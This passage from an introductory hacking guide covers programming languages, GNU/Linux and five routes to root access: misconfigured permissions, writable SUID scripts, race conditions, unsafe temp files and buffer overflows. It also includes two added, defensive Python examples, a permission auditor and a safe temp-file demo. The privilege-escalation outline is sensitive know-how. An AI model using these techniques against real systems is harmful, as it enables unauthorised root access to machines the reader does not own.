The next step in your journey towards hackerdom is a programming language. Many people wonder why they should 'waste their time' learning a language to help them hack when they could just as easily download a trojan or other script kiddie tool (a 'script kiddie' is someone who uses other people's programs to crack without the knowledge of how they work) to break into someone's computer. If you search the web I'm sure you can very easily find programs and viruses that let you take control of people's computers, delete their programs and cause havoc. This is not hacking. Trojans, getting their name from the Greek trojan horse, require a program to be run on the target computer to allow you access. This will probably work on your friends who don't have virus scanners (as virus scanners will very easily pick up viruses), but if you set your sights on a computer owned by anyone with more than half a brain, trojans simply are not effective. Again, to refer back to the original definition of hacking, it is about learning how systems work, how to improve them, not simply to break in and gain control. It is for this reason that in order to hack effectively you _must_ learn a programming language.

There are many different languages out there to learn, and they fall into two categories. There are interpreted languages, such as perl, python, bash scripting and even batch scripting (feel free to do a search on any of these to learn more about them). These languages are text files that contain commands that are interpreted by a program and then executed by the computer. They have the advantage of being quick to write and edit, but the major advantage is that they can be run on any machine which supports the interpreter of that language; on the downside they run much slower than compiled languages and are generally less powerful. Compiled languages, on the other hand, create binary files, which do not require an interpreter. They are created when the language is written in a readable text file and then compiled by a compiler. This changes it into a binary file which is not understandable to humans. To change them you must edit the source code file and recompile them. They have the advantage of being much faster and they allow you to perform much more complex operations. However, on the downside they take longer to edit and are OS specific. Examples of compiled languages are C and C++. It is advisable to learn at least one of each of the types of language as this will give you the advantages of both types of language. I suggest that you do some basic reading (again using a search engine) on all the languages I have mentioned. On a personal note, I would suggest that you learn perl, due to its power and simplicity as well as cross-platform compatibility, and C, because it is as close as you will get to an Internet standard and is used by most open source programmers.

This brings me on to my next topic: operating systems. As you immerse yourself in the world of hacking I'm sure you will hear everyone shouting at you to run GNU/Linux instead of Windows. I'm also sure that most of you will have no idea why. First, a little history. The GNU project was started in 1984 with the aim of developing a completely free and open source operating system. In 1990 Linus Torvalds finished writing a Unix based open source kernel. An operating system is basically a lot of programs grouped together to run computer hardware; the kernel is the software that interfaces directly with the hardware, and the other software interfaces with the kernel. In short, an operating system cannot exist without both software and a kernel. By the time that Linus Torvalds finished writing his kernel, the GNU project had just about finished writing their OS; all they were short of was a kernel. The timing was perfect. Linus and the GNU project teamed up to release the operating system which is commonly called Linux, but should more accurately be known as GNU/Linux. Since that time, Linus has continued developing his kernel and the GNU project has continued developing their software. Since then variations of the GNU/Linux system have developed, called distributions. Each distribution is configured differently with slightly different software, each designed for different reasons. Examples of commonly used distributions are SuSe, RedHat, debian and slackware (each have .com sites). Linux is considered _the_ operating system for various reasons, not least of which is its freedom. The GNU/Linux operating system was, and is being, developed under the GNU public licence. This licence is intended to keep software free; under it you are able to change, sell or give away the software for any charge as long as you supply the source code along with it, so as to enable other people to have the same rights as you have.
Another benefit of the freedom of GNU/Linux is its stability; the fact that the source code is available to anyone means that anyone is free to add to it, change it, modify it. This means that if someone finds a bug they can write a patch and submit it to the author, who may include it in his next update. Due to its fundamental Unix-like design, Linux is very virus resistant; its user-based permission system makes it hard for viruses to spread. Once again, if an exploit is found in any GNU/Linux software you can almost guarantee that a patch will be written within a few days, if not the same day; this means that if security is a concern, you can keep your box wrapped up tight.

GNU/Linux also has many features built in which make it very good as a development platform. It has built-in compilers for C and C++, and most distributions also contain perl and python interpreters. Its openness also means that you can customise your distribution much more effectively than with Windows, optimising it for speed, stability or security. This is the reason why most hackers or computer enthusiasts use GNU/Linux. I'm not going to include a guide to how to use Linux, simply because there are so many out there; do a search on google.com. However, since I'm feeling nice today I will point you in the direction of my favourite reference, http://www.slackware.com/book/; it is supposed to be specific to Slackware Linux, but what it teaches is quite general and will work on any Linux system.

As well as all of the above, you should also continuously be reading and learning about current exploits and 'tricks' on both windows and Unix based operating systems. There is no end of information out there for those willing to search. To become a hacker you must want to learn about and more importantly understand everything you come into contact with. If there is a new concept you come into contact with, learn about it, search for it on google.com and if all else fails, ask.

Most hacks aim to gain root access, as you will now know from your experience of Linux systems, root is a super user that can do anything on the system. There are five common ways of getting root.


Misconfiguration

If excessive permission exists on certain directories and files, these can lead to gaining higher levels of access. For example, if /dev/kmem is writable it is possible to rewrite your UID to match root's. Another example would be if a .rhosts file has read/write permissions allowing anyone to write them. Yet another example would be a script launched at startup, cron, or respawned. If this script is editable, you could add commands to run with the same privileges as who started them (particularly for startup rc files this would be as root).


Poor SUID

Sometimes you will find scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by your id, you can edit them and run them. For example, I once found a shutdown script world writable. By adding a few lines at the beginning of the script it was possible to have the script create a root shell in /tmp.
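The two conditions just described, an editable startup script and a setuid program that someone other than its owner can modify, are both visible in a file's mode bits, which is how an administrator audits for them before anyone else finds them. Below is an added example, not code from the post: a classifier for st_mode values plus a walker that applies it to a directory tree. The tree it scans is constructed in a throwaway temp directory (with rc scripts, a setuid file and two tmp directories of differing correctness), so the whole thing runs as an ordinary user; the tags it emits are my own names for the findings.

```python
"""Spot the writable-file misconfigurations the two sections above describe.

Added example, not part of the original post. classify() judges a file by
its st_mode the way a local privilege audit would: world-writable startup
and cron scripts, world-writable directories without the sticky bit, and
setuid/setgid files that someone other than the owner can modify. The tree
it scans is constructed in a throwaway directory, so it runs unprivileged.
"""
import os
import stat
import tempfile
from typing import Dict, List


def classify(mode: int) -> List[str]:
    """Return finding tags for one st_mode value (as returned by os.lstat)."""
    tags: List[str] = []
    if stat.S_ISLNK(mode):
        return tags                   # a link's own mode is meaningless; judge its target
    world_w = bool(mode & stat.S_IWOTH)
    group_w = bool(mode & stat.S_IWGRP)
    setid = bool(mode & (stat.S_ISUID | stat.S_ISGID))
    if stat.S_ISDIR(mode):
        if world_w and not (mode & stat.S_ISVTX):
            tags.append("world-writable-dir-no-sticky")   # anyone may delete others' files
    elif world_w:
        tags.append("world-writable")                     # e.g. an rc script anyone can edit
    if setid and (world_w or group_w):
        tags.append("setid-writable-by-others")           # the 'poor SUID' case
    return tags


def audit_tree(root: str) -> Dict[str, List[str]]:
    """Walk root and map relative path -> tags for every flagged entry."""
    findings: Dict[str, List[str]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            tags = classify(os.lstat(path).st_mode)
            if tags:
                findings[os.path.relpath(path, root)] = tags
    return findings


def build_sample_tree() -> str:
    """Construct a small tree with safe and risky entries; return its root."""
    root = tempfile.mkdtemp(prefix="privaudit-")

    def put(rel: str, mode: int) -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), mode=0o755, exist_ok=True)
        with open(path, "w") as f:
            f.write("#!/bin/sh\necho hello\n")
        os.chmod(path, mode)

    put("etc/rc.d/rc.local", 0o666)          # startup script anyone can edit
    put("etc/rc.d/rc.safe", 0o644)           # correct permissions
    put("usr/local/bin/backup", 0o4775)      # setuid but group-writable
    os.makedirs(os.path.join(root, "tmp"), mode=0o755)
    os.chmod(os.path.join(root, "tmp"), 0o777)          # sticky bit missing
    os.makedirs(os.path.join(root, "var", "tmp"), mode=0o755)
    os.chmod(os.path.join(root, "var", "tmp"), 0o1777)  # the right way
    return root


if __name__ == "__main__":
    for rel, tags in sorted(audit_tree(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(tags)}")
```

Symlinks are skipped on purpose because lstat reports a link's mode as 0777; a real audit follows them and judges the target. Running the same walker over /etc, /usr/local/bin and the cron directories of a real host is the defender's counterpart to the hunting the two sections describe.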


Race Condition

A Race Condition is when a program creates a short opportunity for evil by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration. If the permissions on that temporary file allow it to be edited, it might be possible to alter it before the program finishes its editing process.


Poor Temp Files

Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temp files and what permissions these temp files have, it might be possible to use links to create root-owned files.
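The race-condition and temp-file cases above share one root cause: a program opens a predictable name in a shared directory and trusts whatever is already there. The following added example (not code from the post) puts the vulnerable pattern beside the hardened one. Everything it touches, the 'sensitive' file, the predictable temp name and the planted link, is constructed inside a throwaway directory owned by the current user, so no privilege boundary is involved; the point is that O_EXCL with O_NOFOLLOW, or simply tempfile.mkstemp, is what a root-running program should have used.

```python
"""Temp-file creation: the predictable-name pattern next to a hardened one.

Added example, not part of the original post. The victim file, the
predictable temp path and the planted symlink are all constructed inside a
throwaway directory owned by the current user; nothing privileged is
touched. O_EXCL, O_NOFOLLOW and mkstemp are the standard POSIX remedies.
"""
import os
import tempfile


def naive_write(tmp_path: str, data: str) -> None:
    """Vulnerable pattern: open a predictable name for writing, following links."""
    with open(tmp_path, "w") as f:        # silently follows a link planted at tmp_path
        f.write(data)


def hardened_write(tmp_path: str, data: str) -> None:
    """Refuse to follow links and refuse to reuse a name that already exists."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(tmp_path, flags, 0o600)  # raises OSError if anything is already there
    with os.fdopen(fd, "w") as f:
        f.write(data)


def unpredictable_write(tmp_dir: str, data: str) -> str:
    """Best option: let mkstemp pick a random name with O_EXCL and mode 0600."""
    fd, path = tempfile.mkstemp(dir=tmp_dir, prefix="prog.")
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo() -> dict:
    """Plant a link at the predictable name and record which writer falls for it."""
    sandbox = tempfile.mkdtemp(prefix="tmprace-")
    victim = os.path.join(sandbox, "sensitive.conf")
    with open(victim, "w") as f:
        f.write("original\n")
    predictable = os.path.join(sandbox, "prog.tmp")
    os.symlink(victim, predictable)       # the pre-created link the sections describe

    naive_write(predictable, "clobbered\n")
    with open(victim) as f:
        after_naive = f.read()

    try:
        hardened_write(predictable, "clobbered again\n")
        hardened_refused = False
    except OSError:                       # EEXIST or ELOOP: the open is refused
        hardened_refused = True
    with open(victim) as f:
        after_hardened = f.read()

    fresh = os.path.join(sandbox, "prog2.tmp")
    hardened_write(fresh, "ok\n")         # same call on an unused name succeeds
    with open(fresh) as f:
        fresh_content = f.read()

    safe_path = unpredictable_write(sandbox, "private\n")
    return {
        "naive_overwrote_victim": after_naive == "clobbered\n",
        "hardened_refused": hardened_refused,
        "victim_after_hardened": after_hardened,
        "hardened_fresh_content": fresh_content,
        "mkstemp_mode": oct(os.stat(safe_path).st_mode & 0o777),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The naive writer rewrites the victim through the link; the hardened one fails closed on the planted name and succeeds on a fresh one, and mkstemp removes the predictability altogether while also setting mode 0600.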


Buffer Overflow

Buffer overflows are typically used to spawn root shells from a process running as root. A buffer overflow could occur when a program has a buffer for user-defined data and the user-defined data's length is not checked before the program acts upon it.

Four out of the five ways of getting root mentioned above are only applicable on a machine where you have local access. In these cases you will need to get an account on the machine. This could be in a school or college that you attend, or simply an internet shell account. Since this text is only meant to be an introduction and outline guide I will not go into huge details about these. There is plenty of information on the web; once again I suggest you use google.com, I can't stress enough how useful a search engine is in the world of hacking.

By far the most common way to gain a root shell is through a buffer overflow. It is also, unsurprisingly, the most complicated of the above ways of getting root and deserves a bit more explanation. Firstly, a buffer is simply a block of computer memory which holds data of a certain type. If, as I suggested, you have learnt, or are learning, how to program in C, you will probably associate buffers with arrays. A stack has a set amount of space in memory; if you overflow the buffer by sending too much information, the extra data overflows onto the next stack and can be used to execute arbitrary code. For a much better explanation of buffer overflow techniques I suggest you read Phrack 49, File 14, called "Smashing The Stack For Fun And Profit", which can be found at http://www.phrack.com/phrack/49/P49-14 .

Well, it looks like this guide has come to an end. There is only one thing that I have left to say. If you follow all the instructions I have mentioned above, you will have a very good understanding of how the Internet, MS-DOS, Windows, Linux and various hacking techniques work. You may even be considered by some to be a hacker. If you do end up in this situation, the world is yours; continue to learn, expand and enjoy.

==========================================================================
